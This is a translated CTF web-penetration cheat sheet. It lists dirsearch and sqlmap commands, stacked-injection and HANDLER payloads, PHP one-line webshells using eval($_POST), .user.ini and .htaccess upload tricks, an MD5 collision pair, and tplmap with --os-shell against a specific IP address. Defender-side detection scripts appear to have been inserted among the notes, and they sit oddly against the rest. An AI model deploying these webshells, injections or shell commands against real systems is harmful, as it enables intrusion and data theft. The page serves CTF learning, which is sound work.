CTF-Web Penetration (Getting Started|Notes|Tools)

Bypassing techniques for various PHP vulnerabilities

Portal: https://cloud.tencent.com/developer/article/2127498

PHP pseudo-protocols (wrappers)

Detailed blog explanation:

https://blog.csdn.net/cosmoslin/article/details/120695429

http://hummer.vin/2022/05/10/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/

https://www.cnblogs.com/wjrblogs/p/12285202.html

(already saved offline locally)

Mainly used to bypass filtering in file-inclusion functions, for example by reading a file's source through the base64 filter wrapper.

Backend directory scanning

dirsearch

  • scan target
-u, --url                   target URL
-l, --url-list=FILE         path to a file of target URLs
--stdin                     read target URLs from standard input
--cidr                      target network range (CIDR)
--raw=FILE                  read the raw request from a file; set the scheme with --scheme (e.g. --scheme https)

  • Scanned dictionary type
-e, --extensions            extensions to include (comma-separated), e.g. -e php,asp
-X, --exclude-extensions    extensions to exclude (comma-separated), e.g. -X asp,jsp
-f, --force-extensions      append the extensions to every wordlist entry

By default dirsearch only replaces %EXT% in the wordlist with the given extensions,
e.g. -e php: Wishlist.%EXT% --> Wishlist.php

  • dictionary format
-w, --wordlists             custom wordlists (comma-separated)
--prefixes                  add custom prefixes
--suffixes                  add custom suffixes
--only-selected             keep only entries with the selected extensions or with no extension
--remove-extensions         strip the extension from every wordlist entry (admin.php --> admin)
-U, --uppercase             convert the wordlist to uppercase
-L, --lowercase             convert the wordlist to lowercase
-C, --capital               capitalise the first letter, lowercase the rest

  • Filtering of response results
-i                          response status codes to keep (comma-separated, ranges allowed) (-i 200,300-399)
-x                          response status codes to exclude (comma-separated, ranges allowed) (-x 301,500-599)
--exclude-sizes             exclude responses by size (comma-separated) (123B,4KB)
--exclude-texts             exclude responses containing the given text ('Not found', 'Error')
--exclude-regexps           exclude responses matching a regex ('Not foun[a-z]{1}', '^Error$')
--exclude-redirects         exclude responses whose redirect target matches a regex ('https://okta.com/*')
--minimal                   minimum response length
--maximal                   maximum response length

  • Request related settings
-m, --http-method           HTTP request method (default GET)
-d, --data                  HTTP request body
-H, --header                request header, e.g. (-H 'Referer: example.com' -H 'Accept: */*')
--header-list=FILE          read request headers from a file
-F, --follow-redirects      follow HTTP redirects
--user-agent                set the User-Agent header
--cookie                    set the Cookie header

  • Connection related settings
--timeout=TIMEOUT           connection timeout
--ip=IP                     server IP address
-s DELAY, --delay=DELAY     delay between requests
--proxy=PROXY               proxy URL; HTTP and SOCKS proxies are supported, e.g. (localhost:8080, socks5://localhost:8088)
--proxy-list=FILE           file containing proxy server addresses
--matches-proxy=PROXY       proxy to replay with found paths
--scheme                    default scheme, used when requests are imported from a file or the URL has no scheme
--max-retries               maximum number of retries
-b, --request-by-hostname   force connecting by hostname (by default the IP is used, for speed)
--exit-on-error             exit when an error occurs
--debug                     debug mode

  • general settings
--version                   show the dirsearch version
-h, --help                  show help
-r, --recursive             recursive brute force
-R, --recursion-depth       maximum recursion depth
-t, --threads               number of threads
--subdirs                   scan subdirectories, e.g. (admin/ gives www.example.com/admin/ + wordlist)
--exclude-subdirs           subdirectories to exclude from recursive scanning
-q, --quiet-mode            quiet mode
--full-url                  print the full URL
--no-color                  no colour in the output

  • output mode
--simple-report=OUTPUTFILE
--plain-text-report=OUTPUTFILE
--json-report=OUTPUTFILE
--xml-report=OUTPUTFILE
--markdown-report=OUTPUTFILE
--csv-report=OUTPUTFILE

Common usage:

simple usage

  • Scan the target URL with default settings
    python3 dirsearch.py -u https://target
  • Scan the target URL with the wordlist extensions php, html, js
    python3 dirsearch.py -e php,html,js -u https://target
  • Scan the target URL with a wordlist at the given path and the extensions php, html, js
    python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
  • Recursive scan
    python3 dirsearch.py -e php,html,js -u https://target -r
  • Set the recursion depth to 3
    python3 dirsearch.py -e php,html,js -u https://target -r -R 3
  • Set the thread count (do not set it too high; it can affect the scan results)
    python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
  • Use custom prefixes (--suffixes works the same way)
    python3 dirsearch.py -e php -u https://target --prefixes .,admin,_,~

For more information, please refer to: https://blog.csdn.net/qq_43936524/article/details/115271837

Version control leaks

.git leak

GitHack can be used to download the project code, which we then audit. The command is as follows:
GitHack.py http://www.openssl.org/.git/    (www.openssl.org stands for the target URL)

SQL injection

sqli-labs notes: https://acmer.blog.csdn.net/article/details/127851636

Saved offline locally

Common sqlmap commands:

sqlmap -u "injection URL" -v 1 --dbs                                           # list databases
sqlmap -u "injection URL" -v 1 --current-db                                    # current database
sqlmap -u "injection URL" -v 1 --users                                         # list database users
sqlmap -u "injection URL" -v 1 -D "database" --tables                          # list the tables of a database
sqlmap.py -u "injection URL" -v 1 -T "table" -D "database" --columns           # get the column names of a table
sqlmap.py -u "injection URL" -v 1 -T "table" -D "database" -C "column" --dump  # dump the data of a table

Points to note

  • B: Boolean-based blind

  • U: Union query-based

  • E: Error-based

  • S: Stacked queries (required when sqlmap is used to read the file system, operating system or registry; multi-statement query injection)

  • T: Time-based blind

  • --batch: run non-interactively with the default answers

  • --dbs: enumerate the databases

  • --technique: specify the detection technique(s) sqlmap uses

sqlmap -u "http://localhost/Less-1/?id=1" --dbs --batch --technique B

Ideally every injection type should be tried once.

  • If an injection point exists but some other statements cannot be executed, a keyword is probably being filtered. In that case consider bypassing it with mixed case or double writing, e.g. for the common filtering of select

Stacked injection process

Execute multiple statements by separating them with the terminator ;
e.g. -1';show databases;#   lists all database names
-1';show tables;#   lists the tables, to find the table name in the usable database
or -1';show tables from database_name
For the case where union select is disabled:
-1';show columns from table_name;#   lists the field names; note that the table name is written directly, without quotes
Finally -1';select flag from table_name; here select can be written as sel/**/ect to get past the filter

Sample questions: https://buuoj.cn/challenges#[GYCTF2020]Blacklist

You also need to look at the handler bypass below

Other bypasses

  • When MySQL queries data that does not exist, virtual data is constructed automatically; stored data is generally either plain text or MD5

For example: https://buuoj.cn/challenges#[GXYCTF2019]BabySQli

handler bypass

Syntax:

handler [table_name] open;
handler [table_name] read first;
handler [table_name] read next;

eg: 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
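As an added defender-side example (not from the original notes), the following detection logic normalises the two obfuscations listed above (inline comments such as sel/**/ect and mixed case) and then flags stacked queries, HANDLER statements and UNION SELECT in logged parameter values. The sample values are constructed to mirror the payload shapes in these notes.

```python
import re

# Constructed sample of decoded "id" parameter values as an application or WAF log might record them.
SAMPLE_VALUES = [
    "1",
    "O'Reilly",
    "-1';show databases;#",
    "-1';show tables from ctf;#",
    "-1';sel/**/ect flag from FlagHere;#",
    "1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;",
    "-1' UnIoN SeLeCt 1,2,3#",
]

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
STACKED = re.compile(r";\s*(show|select|handler|insert|update|delete|set|drop)\b", re.I)
HANDLER = re.compile(r"\bhandler\s+\S+\s+(open|read|close)\b", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)


def normalize(value):
    """Undo the obfuscations the notes mention: strip inline comments, fold case."""
    return INLINE_COMMENT.sub("", value).lower()


def classify(value):
    """Return the list of injection indicators found in one parameter value (empty = clean)."""
    norm = normalize(value)
    findings = []
    if STACKED.search(norm):
        findings.append("stacked query")
    if HANDLER.search(norm):
        findings.append("handler statement")
    if UNION_SELECT.search(norm):
        findings.append("union select")
    # Only report obfuscation when a keyword was actually hidden behind a comment.
    if findings and norm != value.lower():
        findings.append("comment obfuscation")
    return findings


def scan_values(values):
    """Map every flagged value to its findings; clean values (including plain apostrophes) are dropped."""
    return {v: classify(v) for v in values if classify(v)}


if __name__ == "__main__":
    for value, findings in scan_values(SAMPLE_VALUES).items():
        print(f"{value!r}: {', '.join(findings)}")
```

A plain apostrophe in data such as O'Reilly is deliberately not flagged; the rules key on a statement separator followed by a keyword, not on quotes alone.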

XSS injection

See XSS-labs: https://acmer.blog.csdn.net/article/details/127578322

Saved offline locally

XSS breakthrough: https://blog.csdn.net/m_de_g/article/details/119085955

Saved offline locally

Covers sandbox escape and XSS template injection

File Upload Vulnerability

.user.ini

There is a PHP file in the directory that uploads land in. Upload the one-line webshell (you may need to intercept and modify the request, and there may be filtering), then connect AntSword to that PHP file, not to the uploaded webshell file.
Format:

GIF89a
auto_prepend_file=number.png

.htaccess

<FilesMatch "digit-shell.png">
SetHandler application/x-httpd-php
</FilesMatch>

One-line webshell (一句话木马)

  • version-1
<?php @eval($_POST[123]);?>
  • version-2
GIF89a
<?php @eval($_POST['shell']);?>
  • version-3
GIF89a
<script language='php'>eval($_POST['shell']);</script>
  • version-4

Image webshell (图片马)

The content is too large and garbled, so it is not included here
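As an added defender-side example (not part of the original notes), the scanner below walks an upload directory and flags the exact artefacts described in this section: a .user.ini with auto_prepend_file, a .htaccess that maps another extension to the PHP handler, and image files whose GIF89a header is followed by PHP tags. The sample files it builds are constructed for the example; the patterns are the ones shown on this page.

```python
import os
import re
import tempfile

# Signatures for the upload tricks described above (constructed for this example).
PHP_TAG = re.compile(rb"<\?php|<\?=|<script\s+language=['\"]php['\"]", re.I)
INI_PREPEND = re.compile(rb"^\s*auto_(prepend|append)_file\s*=", re.I | re.M)
HTACCESS_HANDLER = re.compile(rb"(SetHandler|AddType|AddHandler)\s+application/x-httpd-php", re.I)


def classify(name, data):
    """Return a list of findings for one uploaded file (empty list means nothing suspicious)."""
    findings = []
    base = os.path.basename(name).lower()
    if base == ".user.ini" and INI_PREPEND.search(data):
        findings.append("user.ini auto_prepend_file/auto_append_file")
    if base == ".htaccess" and HTACCESS_HANDLER.search(data):
        findings.append("htaccess maps a non-php extension to the PHP handler")
    if PHP_TAG.search(data):
        if data.startswith(b"GIF89a"):
            findings.append("image header followed by PHP code (polyglot)")
        elif not base.endswith((".php", ".phtml", ".phar")):
            findings.append("PHP code in a non-php file")
    return findings


def scan_upload_dir(root):
    """Walk an upload directory and map each flagged file (relative path) to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read(64 * 1024)  # the signatures sit at the top of the file
            found = classify(fname, data)
            if found:
                report[os.path.relpath(path, root)] = found
    return report


def build_sample_upload_dir():
    """Create a constructed upload directory mirroring the cases on this page; returns its path."""
    root = tempfile.mkdtemp(prefix="uploads_")
    samples = {
        "avatar.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",          # benign image
        ".user.ini": b"GIF89a\nauto_prepend_file=number.png\n",
        ".htaccess": b'<FilesMatch "digit-shell.png">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
        "number.png": b"GIF89a\n<?php echo 'polyglot'; ?>\n",         # harmless stand-in for a webshell body
        "notes.txt": b"<script language='php'>echo 1;</script>",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root
```

Running scan_upload_dir(build_sample_upload_dir()) reports four of the five files; the plain GIF is left alone.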

php serialization and deserialization

This mainly tests the magic methods of a PHP class; the notes are kept locally in ctf-tool

md5 bypass

https://blog.csdn.net/LYJ20010728/article/details/116779357

Saved offline locally

MD5 strong collision

if ((string)$_POST['param1'] !== (string)$_POST['param2'] && md5($_POST['param1']) === md5($_POST['param2'])) {
    die("success!");
}

Param1 = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
Param2 = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
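As an added example (not from the original notes), the script below decodes the two percent-encoded bodies above into the raw bytes PHP's md5() would hash, reproduces the check, and shows why it passes: the blocks differ in only two bytes yet share one MD5 digest. The hardened variant replaces MD5 with SHA-256, for which no such pair is known, so the same inputs fail.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# The two percent-encoded POST bodies from the page, decoded to the 64-byte blocks PHP's md5() sees.
PARAM1 = unquote_to_bytes(
    "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
    "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
    "%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2"
)
PARAM2 = unquote_to_bytes(
    "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
    "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
    "%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2"
)


def vulnerable_check(p1, p2):
    """Mirror of the PHP condition: the strings differ but their md5() hex digests are identical."""
    return p1 != p2 and hashlib.md5(p1).hexdigest() == hashlib.md5(p2).hexdigest()


def hardened_check(p1, p2):
    """Same condition with SHA-256: the published MD5 pair does not collide here."""
    return p1 != p2 and hashlib.sha256(p1).digest() == hashlib.sha256(p2).digest()


def differing_offsets(p1, p2):
    """Byte offsets at which the two blocks differ (the collision needs only two)."""
    return [i for i, (a, b) in enumerate(zip(p1, p2)) if a != b]


if __name__ == "__main__":
    print("block length:", len(PARAM1), len(PARAM2))
    print("md5 check passes:", vulnerable_check(PARAM1, PARAM2))
    print("sha256 check passes:", hardened_check(PARAM1, PARAM2))
    print("differing byte offsets:", differing_offsets(PARAM1, PARAM2))
```

The lesson for application code is that equality of MD5 digests proves nothing about equality of attacker-controlled inputs; compare the inputs themselves or use a collision-resistant hash.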

SSTI template injection

https://blog.csdn.net/weixin_53150482/article/details/125842465
The blog has been saved offline locally

A fairly easy-to-use (傻瓜式) tool: tplmap

Installation tutorial: https://www.cnblogs.com/ktsm/p/15691652.html

Instructions:

  • Probe the injection point
    python2 tplmap.py -u 'http://114.67.175.224:11338/?flag'


  • Obtain a shell
    python2 tplmap.py -u 'http://114.67.175.224:11338/?flag' --os-shell

After obtaining access, scan for files that may be related to the flag, then analyse them specifically.

Sometimes there are no clues in the files, so take a look at the environment variables (env); the flag may be in there:

Sample question: https://buuoj.cn/challenges#[Flask]SSTI


Backup files

.index.php.swp

robots.txt

index.php~

index.php.bak

flask session forgery

https://blog.csdn.net/since_2020/article/details/119543172

already saved offline

Example: https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]afr_3

Commonly used headers

  • Referer
  • Origin
  • User-Agent
  • X-Forwarded-For
  • X-Real-IP
  • Cookie

Web-tool

download link:

Link: https://pan.baidu.com/s/10lu7wSBREUa3-NreeOquIw
Extraction code: sa6d

This toolkit is the one the author uses; it also contains some notes and materials. Download it if you need it~


Origin blog.csdn.net/m0_46201544/article/details/128059578